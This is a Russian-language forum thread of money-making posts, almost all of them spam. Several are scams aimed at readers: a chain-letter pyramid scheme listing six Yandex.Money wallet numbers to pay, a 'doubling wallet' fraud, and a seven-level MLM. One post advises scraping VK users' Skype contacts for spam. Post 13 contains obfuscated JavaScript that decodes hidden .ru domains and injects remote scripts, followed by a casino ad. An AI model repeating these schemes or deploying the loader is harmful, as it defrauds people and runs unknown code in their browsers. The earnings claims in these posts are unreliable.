Пример подключение таблицы CSS
Страница 1 из 11
Форум о заработке в интернете: » Форум о заработке в интернете. » Свободный форум о заработке в интернете. » Как я зарабатываю от 1000р каждый день (Как я зарабатываю от 1000р каждый день)
Как я зарабатываю от 1000р каждый день
Marfa1931 Offline
8 постов
Дата: Среда, 28.09.2016, 21.32.30 | Сообщение # 1
Здравствуйте! Если Вы юзаете этот форум - значит озадачились проблемой on-line-заработка.
Заманчивой есть идея - сидя дома в кресле или на диване, держа на коленке ноут, и особенно не 
утруждая себя, зарабатывать, ну так - пару тысяч "зеленых" в месяц, по-началу конечно же. При этом Вы
ни куда не спешите и ни от кого не зависите - Вам не надо в понедельник рано утром на работу,  
не надо выслушивать наставления шефа и ждать дня зарплаты. Вы просыпаетесь, завариваете чашку
любимого кофе, включаете комп и проверяете состояние Вашего счета на наличие новых поступлений. 
Замечательно! Однако деньги случайно, ни от куда не появляются и Вы все таки
должны работать, по началу, может быть, интенсивнее прежнего.
Я озадачился работой в интернет несколько лет назад. Начинал с ноля, рылся в поисковиках - искал 
информацию, регался во множестве интернет проектах, ошибался и добивался определенных результатов.
С уверенность могу сказать, что не все  предложения о заработке стоят Вашего внимания.
На своем сайте www.vpmoney.ru  я представил проекты, которые при должном старании в будущем позволят Вам зарабатывать 
те самые несколько тысяч долларов  в месяц и обрести финансовую независимость. Однако не думайте, 
что деньги польются рекой и сразу, нужно поработать прежде чем потрогаете первые деньги.
Вот очень интересные сайты о заработке 
www.vpmoney.ru
www.vpmoneyweb.narod.ru
7 постов
Дата: Суббота, 01.10.2016, 15.55.25 | Сообщение # 2
Посмотрел. Там ссылки на САР вроде СЕОспринт. Да, на них можно заработать несколько копеек, но никак не тысячи долларов.
Дата: Четверг, 17.11.2016, 08.40.25 | Сообщение # 3
Здравствуйте!
То, что предсказывал известный блоггер Александр Борисов еще в 2013 году, подтверждается: инфобизнесу, целью которого было "срубить бабло", приходит конец. Интернет становится другим, и заработать в нем теперь могут только профессионалу.
А что делать если вы не являетесь специалистом в какой-либо сфере?
Выход один - учиться.
Но учиться нужно не у псевдогуру, которых пруд пруди в Интернет, а у настоящих профессионалов.
Но курсы у таких профессионалов стоят от 20 000 до 100 000 рублей.
Где взять деньги?
Опять замкнутый круг?
Мне попался очень интересный курс, который предлагает заработать первоначальный капитал, не вкладывая ни копейки, и что интересно, абсолютно не продвигаю какой-либо продукт, без партнерок, и никак не связанный с программами лохотронщиками по выводу денег, с работой в соцсетях, Ютуб и т.п.
Курс называется "АНТИ-ЛОХ".
Этот курс решает проблему первоначального капитала для получения профессии и начала продвижения Вашего бизнеса в Интернет и не только.
http://planofgod.ru/
3 поста
Дата: Четверг, 17.11.2016, 10.36.38 | Сообщение # 4
"Заработок в интернете http://www.goldzona.ru/" "Путешествия По Всему Миру http://wiksik.xyz"
coyote Offline
10 постов
Дата: Воскресенье, 20.11.2016, 10.05.25 | Сообщение # 5
Друзья! как по мне, так я уже перерыл кучу сайтов в поисках заработка. и на всех нужно что то делать, печатать, копировать и т.д. Везде пишут что эта работа без первоначального вложения, что вам при регистрации через кого то сразу зачислят какую то непонятную сумму на ваш счет, которую вы фиг сможете вывести при всем своем желании. И в интернете полно таких объявлений. 
В общем хватит уже попадаться на эти удочки. Есть один реальный проект, о котором расскажу ниже:
Get-luck 
Проект прост, как и все гениальное! Вложив всего 200 рублей (1000 тенге) ОДИН РАЗ, Вы сможете начать зарабатывать в интернете Быстро и Без Усилий! Система из 7 уровней! Пригласите всего ДВА человека ОДИН раз и Ваш чистый доход к примеру на 4 уровне составит УЖЕ 22400 рублей (112000 ТЕНГЕ) на 7 уровне чистый доход более ПОЛУТОРА МИЛЛИОНА РУБЛЕЙ (БОЛЕЕ 8 МИЛЛИОНОВ ТЕНГЕ)! Вы сами можете выбрать когда Вам остановиться! Сам принципиально не хотел вкладывать ни копейки в подобные проекты, но любопытство взяло верх! 
Преимущества: 
1.Доступный вход для начала заработка (200 рублей или 1000 тенге та сумма которой можно рискнуть); 
2. Деньги не хранятся в системе, а переходят от участника к участнику (полное отсутствие рисков); 
3. Все переводы происходят в платежной системе QIWI (быстро, просто, удобно и НАДЕЖНО Ваши деньги, только в Вашем распоряжении) 
Для работы нужен только интернет, немного свободного времени и Ваше желание зарабатывать 
Чем быстрее вы присоединитесь тем быстрее начнете получать хорошие деньги. 

Для того, что бы получить более подробную информацию,а также несколько хороших видео обзоров о данном проекте пишите:
в What`s App +77085549823 
Или в личку https://vk.com/id3965657
Дата: Суббота, 03.12.2016, 03.02.04 | Сообщение # 6
Реальный способ заработать на Яндекс.Деньги. ИЛИ КАК ОБМАНУТЬ ЛОХОТРОНЩИКОВ И ЗАРАБОТАТЬ НА ЭТОМ.
Я расскажу вам:
Нашел я в сети где-то статью приблизительно такого содержания: «Есть в системе Яндекс.Деньги волшебный кошелек, и все что вы на него пошлете вернется вам в удвоенном размере!!! Пошлете 100 рублей придет 200,500 придет 1000 и т.д.». Конечно, всем понятно, лохотрон, но если порыть глубже… Я не поверил, но для теста послал 10 рублей. Примерно через пару часов проверил свой кошелек и обнаружил перевод на 20 рублей! Я удивился. Послал потом еще 10 рублей опять то же самое. Потом послал 50 рублей, мне пришло 100. Осмелев, послал 500 рублей … Что было дальше, думаю, вы уже поняли. Никаких 1000 рублей мне никто не прислал. Понятно как они работают. У них на сервере стоит хитрая программа, которая принимает суммы до 200 рублей (это я узнал когда немножко разбогател положив 150,потом 200 и на 250 обламался),и если быть аккуратным и выслать не большую сумму, но не больше 200 рублей то всегда можно получать в 2 раза больше. У них есть специальная программа, которая смотрит кто сколько переводов сделал и на какую сумму, чтобы определить когда нужно кидануть. До 200 рублей сумма мелкая и они будут ждать пока вы пришлете больше и они опять будут в плюсе. Если аккуратно слать им небольшие суммы то можно их обмануть. Они не смотрят на переводы сами, за них это делает специальный софт (программа), что упрощает вероятность их обмана. Я сейчас зарабатываю на этом около 10000 рублей в неделю. Это не миллионы, но это более-менее стабильный доход. Денег на этих кошельках наверно сотни тысяч,а это наши деньги заработанные мошенническим путем, ВОТ САМ КОШЕЛЁК: 410014080677315
Повторяю! ставку поднимать не стоит, т.к. если ставка выше 200 рублей то программа их забирает даже и не пробуйте!!!
Дата: Понедельник, 05.12.2016, 17.13.50 | Сообщение # 7
Как заработать на машину!!!
УВАЖАЕМАЯ АДМИНИСТРАЦИЯ, ПОЖАЛУЙСТА, НЕ УДАЛЯЙТЕ ЭТО СООБЩЕНИЕ ДАЙТЕ
ВОЗМОЖНОСТЬ ЗАРАБОТАТЬ ЛЮДЯМ И ВАШИМ ПОСЕТИТЕЛЯМ. ЗАРАНЕЕ СПАСИБО.
Прочитайте это до конца, а потом уже решайте стоящее это дело или нет.
Как можно БЫСТРО и без особых затрат ЗАРАБОТАТЬ ДЕНЬГИ??? Да очень
просто! Я очень хотел машину, но денег на нее у меня конечно не было. И тут я вдруг
наткнулся на эту статью и решил попробовать. В ней говорилось, что можно сделать несколько

тысяч руб. за пару недель при вложении всего 180 руб. Дальше там говорилось, что надо

послать по 30 руб. на 6 internet кошельков, которые ниже перечислены. Потом вычеркнуть 1-й

кошелёк из списка, тем самым, сместив список на одну строчку вверх, тем самым 6-я

освобождается, куда Вы вписываете номер своего кошелька и закидываете данное, с Вами на 6-й

строчке, сообщение на 200 разных форумов. Вот тут я и решил попробовать воплотить в жизнь

свою давнюю мечту. Оплатил 180 рублей разместил сообщение на 200 разных форумов. Первая

неделя прошла без результатов, ну вот и всё подумал я. Но не тут-то было, на второй неделе у

меня в кошельке уже было 570 рублей. К концу третьей недели у меня уже было 47610 рублей, к

концу Четвёртой недели 103560 рублей. Короче к концу второго месяца сбылась моя мечта. И вы

тоже можете попробовать на этом заработать. И помните, этот бизнес продолжает существовать и

процветать только БЛАГОДАРЯ ЧЕСТНОСТИ И СЕРЬЕЗНОСТИ УЧАСТНИКОВ. Итак, когда вы достигнете

первой позиции, вы будете иметь тысячи рублей просто как создатель списка! Это стоит 180

руб. и совсем пустяковой работы!!!!!!!! Главное, что эта фишка работает и это здорово!

Займитесь этим сейчас – не откладывая на завтра.... !!!!!!!!!! ВРЕМЯ ДЕНЬГИ !!!!!!!!
…А теперь я могу рассказать Вам, как это работает и самое главное ПОЧЕМУ …! Я вам
обещаю, что если вы будете в точности соблюдать ниже перечисленные инструкции, то вы начнете

получать намного больше денег, чем вы думали, не прилагая к этому особых усилий.
Предложение: Прочтите это пару раз! Следуйте инструкциям и деньги начнут поступать на ваш

кошелёк. Согласитесь это просто! Это легально. И ваш вклад составляет всего 180 руб...
ВАЖНО: Это не обман и это не незаконно при этом вы ничем не рискуете, но это работает!
ЗАМЕТЬТЕ: Следуйте инструкциям в ТОЧНОСТИ, и вы будете владеть огромной суммой денег за

каких-то 20 - 60 дней. Вот те самые 3 шага к успеху:
1. Вам нужно зарегистрироваться в системе yandexmoney, который находится по адресу

https://money.yandex.ru
Хорошенько ознакомьтесь с данной системой, как она работает, выберите оптимальный для себя

вариант пополнения кошелька со странички ,внесите 180 руб. на свой кошелёк. Чтобы посмотреть

свой счет на яндекс-деньги необходимо в правом верхнем углу просто нажать по сумму на счете.
2. Возьмите 1-й номер кошелька из нижеуказанного списка, отправьте на него 30 руб., в поле

«Примечание» напишите "Пожалуйста, внесите меня в список кошельков". Все что Вы сделали это

создали некую услугу и самое главное это абсолютно легально. Вы просите законный сервис за

который платите. Отправьте 180 руб. на следующие кошельки (в каждый по 30 руб.): - иначе,

сетевыми модераторами кошельков, вы просто не будете включены в систему и не сможете

обналичить доход.
1. 410011295235932
2. 410011853435357
3. 410011193435991
4. 410013588724369
5. 41001767288882
6. 410013285536095
Теперь вычеркните из этого списка 1-й кошелёк, переместив тем самым список на одну
строку выше (6 становится 5, 5 становится 4…..) И впишите в 6-тую строчку Ваш кошелёк.
3. Делайте какие хотите изменения, но сохраните главную идею. Разместите эту статью на не

менее чем 200 форумах и новостных лентах (newsgroups). Запомните, чем больше вы
разместите тем выше будет ваш доход, и этот доход будет на прямую зависеть от вас. Этот

бизнес продолжает существовать и процветать только благодаря честности и серьезности

участников. И так когда вы достигнете первой позиции вы будете иметь десятки тысяч руб.

просто как создатель списка! Это стоит 180 руб. и совсем пустяковой работы!! Займитесь этим

сейчас – не откладывая на завтра ….!! Время деньги!
А теперь я вам расскажу почему вы в любом случае ничего не теряете, а только
выигрываете! Скажем из 200 размещений я получу только 5 ответов (очень низкая цифра). Значит

я сделаю 150 руб. находясь на 6 позиции в списке. Теперь эти 5 людей делают опять же МИНИМУМ

200 размещений с моим кошельком на 5 позиции, и только 5 людей отвечают тем 1-ом 5 – это уже

750 руб. Дальше эти 25 людей делают по 200 размещений с моим кошельком на 4 строчке и только

5 отвечают – мой доход 3750 руб.. Теперь эти 125 людей разместив и получив только по 5

ответов дают мне 18750 руб. прибыли (я на 3 позиции). Дальше смешнее: эти 625 делают по

минимум 200 размещений со мною на 2 строчке и только 5 людей отвечают – это 93750 руб..

Самое интересное это то, что эти 3125 людей сделают еще по 200 размещений, ну а если им

ответят только 5 людей то я уже получаю 468750 руб.. Не так ли внушительная цифра? И это всё

за первоначальный вклад в 180 руб. Когда вас в списке уже нет вы просто высылаете 180 руб. и

тем людям из списка и ставите свой кошелёк на 6 позицию и опять размещаете. Вы себе можете

представить, что тысячи людей со всего мира присоединяются к Интернету и читают эти статьи

каждый день. Так же как и вы сейчас читаете эту! Так что? Потратите ли вы 180 руб. что бы

узнать работает ли это??? Это строка для пессимистов: А если этот бизнес рухнет и никто мне

денег не пришлет??? Ну и что! Каждый день в Интернете появляются от 20000 до 50000 новых

пользователей. По прогнозам специалистов только в России к 2007 году количество

пользователей интернета увеличится с нынешних 19 млн. пользователей до 28 млн.! Какие

шансы, что они все-таки захотят попробовать себя в чем-то новом??? Ну и последнее: Это

действительно великая аксиома – чтобы получить что-то надо дать что-то, а что бы получить

еще больше надо дать еще больше! Убедитесь в этом сами… Некоторые люди начали писать, что

уже пробовали себя в этом виде заработка, и поступлений было мало либо вообще не было,

утверждая, что форумы пестрят подобными объявлениями и призывами - ЭТО НЕ ТАК! Это самая

действенная и надежная на сегодняшний день система. Участник ничего не зарабатывает только в

2 случаях:
• если он нечестен;
• если отправил эту статью менее чем на 60 форумов.
Рекомендую каждому, кому стал интересен этот процесс заработка – сохранить этот вариант

статьи и в of-line режиме поразмыслить хотя бы сутки. Уверен, когда доберётесь до сути,

многим из Вас станет интересно продолжение.., которое Вы будете строить самостоятельно … Как

распространять информацию в форумах.
1. Открываем поисковик yandex.ru, rambler.ru и т. д
2. Пишем в строке поиска фразу: форум
3. Поисковик найдет тысячи страниц, ссылки на которые сразу приводят на форум для
заполнения новой темы форума. Удачи всем!
MariaLavrova Offline
109 постов
Дата: Среда, 14.12.2016, 13.03.09 | Сообщение # 8
Реальный способзаработать на Яндекс.Деньги. ИЛИ КАК ОБМАНУТЬ ЛОХОТРОНЩИКОВ И ЗАРАБОТАТЬ НА
ЭТОМ. 
Я расскажу вам: 
Нашела я в сети где-то статью приблизительнотакого содержания: «Есть в системе Яндекс.Деньги волшебный кошелек, и все что
вы на него пошлете вернется вам в удвоенном размере!!! Пошлете 100 рублей
придет 200,500 придет 1000 и т.д.». Конечно, всем понятно, лохотрон, но если
порыть глубже… Я не поверила, но для теста послала 10 рублей. Примерно через
пару часов проверила свой кошелек и обнаружил перевод на 20 рублей! Я удивилась.
Послала потом еще 10 рублей опять то же самое. Потом послала 50 рублей, мне
пришло 100. Осмелев, послала 500 рублей … Что было дальше, думаю, вы уже
поняли. Никаких 1000 рублей мне никто не прислал. Понятно как они работают. У
них на сервере стоит хитрая программа, которая принимает суммы до 200 рублей
это я узнала когда немножко разбогатела положив 150,потом 200 и на 250 обламалась),и
если быть аккуратным и выслать не большую сумму, но не больше 200 рублей то
всегда можно получать в 2 раза больше. У них есть специальная программа,
которая смотрит кто сколько переводов сделал и на какую сумму, чтобы определить
когда нужно кидануть. До 200 рублей сумма мелкая и они будут ждать пока вы
пришлете больше и они опять будут в плюсе. Если аккуратно слать им небольшие
суммы то можно их обмануть. Они не смотрят на переводы сами, за них это делает
специальный софт (программа), что упрощает вероятность их обмана. Я сейчас
зарабатываю на этом около 10000 рублей в неделю. Это не миллионы, но это
более-менее стабильный доход. Денег на этих кошельках наверно сотни тысяч,а это
наши деньги заработанные мошенническим путем, ВОТ САМ КОШЕЛЁК: 410013570916029
Повторяю! ставку поднимать не стоит, т.к. еслиставка выше 200 рублей то программа их забирает даже и не пробуйте!!!
gaisman Offline
7 постов
Дата: Суббота, 04.02.2017, 20.21.28 | Сообщение # 9
Вообщем хотел бы посоветовать, тем кто реально хочет зарабатывать в интернете хорошие деньги, всего 6 проектов, это -http://www.seosprint.net/?ref=7303907
http://vktarget.ru/?ref=1980733
http://socpublic.com/?i=697470
http://cashbox.ru.com/Home/PInfo/2fbd87 … 930b0a4b05
http://seo-fast.ru/?r=983188
https://profitcentr.com/?r=gaismanПонятно, что просматривая сайты, выполняя копеечные задания много вы не заработаете (но все таки это какой ни какой а заработок до 300 руб. в день). Но я и не предлагаю этого делать, вся работа заключается в том, чтобы это делали за вас другие. Регистрируйтесь в этих проектах, и начинаете привлекать рефералов (усиленно, каждый день, по несколько часов в день) можно потратить все выходные, но поверьте это принесет свои плоды. Понятно, что можно и платно привлечь, но если на это нет денег. ищем бесплатные пути. Ищем форумы о заработке, желательно стран СНГ, Казахстан, Таджикистан, Узбекистан, Азербайджан и так далее, регистрируемся на этих форумах и кидаем свои реферальные ссылки, ну расписываем там все красиво все плюсы указываем и.т.д., далее можно в ютюбе - тоже ищем каналы о заработке в интернете (их там тма тьмущая) и пишем под видео свои сообщения (только свои реф.ссылки вначале сокращаем иначе сообщение не оставить, ютюб не пропускает) вот тут можно сократить - https://goo.gl/ , также сокращенные ссылки указываем и в соц.сетях тоже в группах о заработке.ВОТ ВИДЕО КАК РЕФЕРАЛЫ РАБОТАЮТ НА ВАС - Потом есть программы специальные которые собирают информацию о людях вконтакте (именно их скайп) и можно разослать им потом в скайпе свою информацию (реф ссылки), а это сразу несколько тысяч человек. Вобшем без единого вложения вы набираете себе рефералов, которые начинают приносить вам процент. Ваша работа будет заключаться только в поиске и привлечении рефералов (людей. которые работая будут приносить вам процент, только за то, что вы их пригласили) изучение разных способов. Не надо кидаться на биржы, форексы, пытаться стать блогером и т.д неполучится. А как только ваша работа начнет приносить первые плоды (деньги) их вы сможите начать тратить уже на платное привлечение рефералов их тоже существует множество способов.Главное не надо прыгать с сайта на сайт с форума на форум в поисках заработка в интернете, вот эти пять проектов (ссылки указаны вначале) проверены и выплачивают деньги моментально на несколько электронных кошельков (на ваш выбор), я пользуюсь карточкой яндекс денег. В любом магазине или банкомате рассплачиваюсь ей быстро и без процентов.На этих проектах вы можите и просто поработать (не привлекая рефералов) заработать в день можно от 300 -500 рублей. Если вас это устраивет, то просто регистрируйтесь и выполняйте задания, просматривайте сайты, и.т.д.Но лучьше получать 1% от усилий 100 человек, чем 100 % от собственных усилий, так как иногда бывает, что 1 % в тысячу раз больше 100% .

Добавлено (04.02.2017, 20.21.28)
---------------------------------------------

viktor17014 Offline
24 поста
Дата: Пятница, 10.02.2017, 02.46.56 | Сообщение # 10
Норм подработка, регистрируешься и пиаришь свою ссылку, за каждый переход по вашей ссылке 1 грн, 100 переходов 100 грн, это не обман, вложения не нужны, это сайт приватбанка, обманов не будет, пробуйте) По всем вопросам в личку! https://www.bestchange.ru/?p=87733
Дата: Суббота, 11.02.2017, 10.28.23 | Сообщение # 11
Ссылка на SuperBonus http://file-7.ru/download/1bqwj5fc Ссылка на бота в Smmok http://file-7.ru/download/fug7dyzg Тоже не плохая подработка.
Дата: Суббота, 11.02.2017, 18.11.07 | Сообщение # 12
Вот еще ссылка на сайты с играми http://zarabotayvinete.zzz.com.ua/game.html. Проверенно, реально платят.
asdf2117 Offline
1 пост
Дата: Четверг, 16.02.2017, 19.20.39 | Сообщение # 13
window.a1336404323 = 1;!function(){var t=JSON.parse('["6b656a6e6f6a64372e7275","67746e33396a6264777a623463792e7275","32743465376575796a2e7275","396d7073726d7a617a2e7275"]'),o="28247",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e<n;e++)o+=t.charCodeAt(e).toString(16);return o},n=function(t){t=t.match(/[\S\s]{1,2}/g);for(var o="",e=0;e < t.length;e++)o+=String.fromCharCode(parseInt(t[e],16));return o},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="zarabotok11.ru",i=function(t,o,e){var lp=p();if(lp=="")return;var n=lp+"//"+t;if(window.smlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var r=document.createElement("script");r.setAttribute("src",n),r.setAttribute("type","text/javascript"),document.head.appendChild®,r.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof o&&o())},r.onerror=function(){this.a1649136515||(this.a1649136515=!0,r.parentNode.removeChild®,"function"==typeof e&&e())}}},a=function©{var f=t,l=n(f)+"/ajs/"+o+"/c/"+e®+"_"+(self===top?0:1)+".js";window.a3164427983=f,i(l,function(){},function(){t[c+1]&&a(c+1)})},f=function(){a(0)};f()}();Только тут ты гарантированно вернешь свои деньги в случае неудачной игры! Доверь свою игру лучшему зарубежному онлайн казино! Регистрация тут http://wltogethergaming.adsrv.eacdn.com/C.ashx?btag=a_353b_12c_&affid=168&siteid=353&adid=12&c=
Дата: Суббота, 25.02.2017, 12.44.10 | Сообщение # 14
Приложение Appcent - приложение, с которым можно заработать до 500 рублей за 1-2 часа работы, также абсолютно безопасное для вашего телефона т.к. нет никакой рекламы и вирусов, плюс дают промокод: XYZ18G для получения 50 бонусов. Всем советую, Удачи!!!
http://appcent.ru/p/XYZ18G
Это действительно вполне реальный способ заработать, просо скачивая приложения. Да, доход небольшой, но самое главное - все абсолютно честно и без обмана. Сколько работал - столько и получил. Пробуйте! И не забудьте про промокод выше !!
Дата: Суббота, 25.02.2017, 15.40.31 | Сообщение # 15
Вся правда о Golden Tea https://www.youtube.com/watch?v=peVWI5nI4JA
Форум о заработке в интернете: » Форум о заработке в интернете. » Свободный форум о заработке в интернете. » Как я зарабатываю от 1000р каждый день (Как я зарабатываю от 1000р каждый день)
Страница 1 из 11
Поиск:

Форум - главная страница